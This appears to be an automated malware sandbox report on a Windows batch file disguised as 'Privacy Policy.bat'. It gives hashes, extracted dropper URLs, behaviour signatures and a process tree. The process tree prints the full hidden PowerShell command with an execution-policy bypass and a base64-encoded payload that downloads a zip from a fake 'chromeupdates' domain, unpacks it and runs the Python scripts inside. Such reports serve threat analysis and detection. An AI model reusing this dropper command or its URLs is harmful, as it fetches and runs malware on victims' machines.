Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/11/2024, 19:55

General

  • Target

    Privacy Policy.bat

  • Size

    6KB

  • MD5

    25fa3f5f45eb6b3632353718d45b282c

  • SHA1

    c691a71779737379d2276fe60151fdf9609a77e6

  • SHA256

    306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936

  • SHA512

    f2d6c752fa37af2e6ca8b9c4c2ffe3f2e56a137f44af932f3b79640d53c8bf2903877c3fe944f61be983639701877bdbabd0aee80e8e87ac24373122f19e2772

  • SSDEEP

    192:wOFqmyT20cb6MuFxH3o7DmTFWJalSN+g4MD:wOFqmbbyFxHaVJGSN+g4M

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://raw.githubusercontent.com/poseidon1338/sp04/refs/heads/main/sbat2

exe.dropper

https://chromeupdates.com/Env.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep by"pas"s -w hid"de"n -enc JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"GgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcABvAHMAZQBpAGQAbwBuADEAMwAzADgALwBzAHAAMAA0AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBzAGIAYQB0ADIAJwANAAoAJAB1AHIAbAAyACAAPQAgACcAJwANAAoAZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAIAAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAnAA0ACgAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAAtAG4AYQBtAGUAIABXAGkAbgAzADIAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBQAGEAcwBzAFQAaAByAHUADQAKAA0ACgAgACAAJABoAHcAbgBkACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAcABpAGQAKQAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIABpAGYAIAAoACQAaAB3AG4AZAAgAC0AbgBlACAAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8AKQAgAHsADQAKACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgAH0AIABlAGwAcwBlACAAewANAAoADQAKACAAIAAgACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAATgBlAHcALQBHAHUAaQBkAA0ACgAgACAAIAAgACQASABvAHMAdAAuAFUASQAuAFIAYQB3AFUASQAuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAgAD0AIAAkAFUAbgBpAHEAdQBlAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQANAAoAIAAgACAAIAAkAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAAxADAAMgA0AA0ACgAgACAAIAAgACQAVABlAHIAbQBpAG4AYQBsAFAAcgBvAGMAZQBzAHMAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAAtAGUAcQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlA"CAAfQApAA0ACgAgACAAIAANAAoAIAAgA"CAAIAAkAGgAdwBuAGQAIAA9ACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAaAB3AG4AZAAsACAAMAApAA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABlAG4AdgBwACAAPQAgACIAQwA6AFwAVwBpAG4ARQB4AHAAbABvAHIAZQByAFwAIgANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZQBuAHYAcAApACkAIAB7AA0ACgAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAbgB2AHAADQAKACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAQAbAB3R5uAGcAIABkAKsebgAgABEB4wAgABEBsAHjHmMAIAB0AKEebwA6ACAAJABlAG4AdgBwACIADQAKAH0ADQAKAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACMAVwByAGkAdABlAC0ASABvAHMAdAAgACIAEAGwAd0ebgBnACAAZACrHm4AIAARAeMAIAB0ANMebgAgAHQAoR5pADoAIAAkAGUAbgB2AHAAIgANAAoAfQANAAoAJABlAG4AdgB1ACAAPQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAHUAcABkAGEAdABlAHMALgBjAG8AbQAvAEUAbgB2AC4AegBpAHAAIgANAAoAJABlAG4AdgB6ACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAFcAaQBuAEgAZQBsAHAAZQByAC4AegBpAHAAIgANAAoAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAGwAaQBlAG4AdAApAC4ARABvAFcAbgBsAG8AQQBkAEYAaQBsAGUAKAAkAGUAbgB2AHUALAAgACQAZQBuAHYAegApAA0ACgB0AHIAeQAgAHsADQAKACAAIAAgACAAIwAgAFQAox5pACAAdABoALABIAB2AGkAxx5uACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBGAGkAbABlAFMAeQBzAHQAZQBtACAAbgC/HnUAIABjAGgAsAFhACAAYwDzAA0ACgAgACAAIAAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAiAA0ACgANAAoAIAAgACAAIAAjACAAEAGwAd0ebgBnACAAZACrHm4AIAARAb8ebgAgAGYAaQBsAGUAIABaAEkAUAAgAHYA4AAgAHQAaACwASAAbQDlHmMAIAARAe0AYwBoAA0ACgAgACAAIAAgACQAegBpAHAARgBpAGwAZQBQAGEAdABoACAAPQAgACQAZQBuAHYAegANAAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBGAG8AbABkAGUAcgAgAD0AIAAkAGUAbgB2AHAADQAKAA0ACgAgACAAIAAgACMAIABHAGkAox5pACAAbgDpAG4AIABmAGkAbABlACAAWgBJAFAADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAFoAaQBwAEYAaQBsAGUAXQA6ADoARQB4AHQAcgBhAGMAdABUAG8ARABpAHIAZQBjAHQAbwByAHkAKAAkAHoAaQBwAEYAaQBsAGUAUABhAHQAaAAsACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4ARgBvAGwAZABlAHIAKQANAAoADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARwBpAKMeaQAgAG4A6QBuACAAdABoAOAAbgBoACAAYwD0AG4AZwAhACIAOwANAAoAfQAgAGMAYQB0AGMAaAAgAHsADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwDzACAAbADXHmkAIAB4AKMeeQAgAHIAYQAgAHQAcgBvAG4AZwAgAHEAdQDhACAAdAByAOwAbgBoACAAZwBpAKMeaQAgAG4A6QBuADoAIgANAAoAfQANAAoAJABzAHQAIAA9ACAAJABlAG4AdgBwACAAKwAgACIARwBpAG0AcABvAHIAdAAuAGQAYQB0ACIADQAKACQAcwB0AGMAdAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHMAdAAgAC0AUgBhAHcAIAANAAoAJABzAHQAYwB0ADIAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAHQAIAAtAFIAYQB3AA0ACgANAAoAJABzAHQAYwB0ACAAPQAgACQAcwB0AGMAdAAgAC0AcgBlAHAAbABhAGMAZQAgACIAJQB1AHAAJQAiACwAIAAkAHUAcgBsACAADQAKACQAcwB0AGMAdAAyACAAPQAgACQAcwB0AGMAdAAyACAALQByAGUAcABsAGEAYwBlACAAIgAlAHUAcAAlACIALAAgACQAdQByAGwAMgANAAoAJAByAHQAYwAxACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAHYAYwByAHUAbgB0AGkAbQBlADEANAAwAC4AcAB5ACIADQAKACQAcgB0AGMAMgAgAD0AIAAkAGUAbgB2AHAAIAArACAAIgB2AGMAcgB1AG4AdABpAG0AZQAxADQAMABkAC4AcAB5ACIADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAcgB0AGMAMQAgAC0AVgBhAGwAdQBlACAAJABzAHQAYwB0AA0ACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHIAdABjADIAIAAtAFYAYQBsAHUAZQAgACQAcwB0AGMAdAAyAA0ACgAkAGUAIAA9ACAAJABlAG4AdgBwACAAKwAgACIAcAB5AHQAaABvAG4ALgBlAHgAZQAiACAA"DQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHM"AIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAGAAIgAkAHIAdABjADEAYAAiACIAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBgACIAJAByAHQAYwAyAGAAIgAiACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1824
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp"
          4⤵
            PID:1660

    Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\77uqfd2w.dll

            Filesize

            3KB

            MD5

            eff24776c5ea4ca313b317a0a130e3f5

            SHA1

            6155d10acff863e48c6daf94abc717a01bd23f24

            SHA256

            8a882d47c662389785a26808ecf3290e8caca4d84bb199feb75a37a8eb94fd6d

            SHA512

            d526e3cb364a8847c908b3725a2d8ee8eb8f6230a9dac572d1b78596dff80bdf97f2fd94635e3621f94ef341b56e2573176dfc412847eb082dbfb81c62bb4e68

          • C:\Users\Admin\AppData\Local\Temp\77uqfd2w.pdb

            Filesize

            7KB

            MD5

            bb0c6ea81fdbba60e594aa1bfa1164f5

            SHA1

            c06d029700e62b15c82fe6f4588856c9abcad119

            SHA256

            4f8d3318a69d82b50512e8e1c57f0ad721a3351590f95242665610774b7b2290

            SHA512

            f87e7b424c9303f21f77a0399568aba6730e32ea050f3df77c691e38dda91d6a6357aa51a0ebd971196b53c097f4fbc1bb0fe889a32aef9d5e2ae08645884238

          • C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp

            Filesize

            1KB

            MD5

            97cd5937f41ec0eac002770b4b081b9f

            SHA1

            a82bf85592e9c2c326e2c93076c4f0ded1d4f25c

            SHA256

            33cee92a699239271539105e70592133ee8393d50f5b04ff9598a9bd4539f56b

            SHA512

            a5b69c710fa8f1cf545c071b86843e92a9ddcdfb3523df0e5dc364e5ad472bbccd851e8045f37e4718fcb8f3646d09cdb14e9d73591fffaf8d711b7b28766f7a

          • \??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.0.cs

            Filesize

            237B

            MD5

            a6e80541a483188dbce2f3d843fcbe4d

            SHA1

            a1f2e13a3314ab6a676751936c7b3b9a9fb9103e

            SHA256

            d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9

            SHA512

            6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

          • \??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline

            Filesize

            309B

            MD5

            7abe853e22ad6754fb8c310d701e426f

            SHA1

            fc936fa42b2bda340cec91cf3037d74be2fce6f2

            SHA256

            f5f3a6b2639b874b9421aa015abcc461e2731293875cdefde27fe6f9e9feaa14

            SHA512

            1e226ff9b3b767fca4711628e338171e43093be0a334e1e4b2f63ca9e8a1f2f62f0ffe225719acf0d3254eae39dccab95aa6a9bfdd91277523458a5a3cc4ecc1

          • \??\c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp

            Filesize

            652B

            MD5

            edc11b3922d216360ca544fb4877562e

            SHA1

            4fa1dbc2b1c8af96b2afeb67811de2474a3fd431

            SHA256

            7b7dde2aeba3e015615f8d492c41e2a13ade1fd75c13afa478cd298ff40c802b

            SHA512

            59431ff0c390cc731a53c46132600182e4365883ae28c7c6f9c6fed702ee95f94742a321f32307cea7c04c8cab525c9f45293666c1c9e10fd88461ae6df6563a

          • memory/1824-23-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/1824-15-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-12-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

            Filesize

            4KB

          • memory/2576-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB

          • memory/2576-6-0x0000000002150000-0x0000000002158000-memory.dmp

            Filesize

            32KB

          • memory/2576-25-0x00000000029F0000-0x00000000029F8000-memory.dmp

            Filesize

            32KB

          • memory/2576-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

            Filesize

            2.9MB

          • memory/2576-30-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

            Filesize

            9.6MB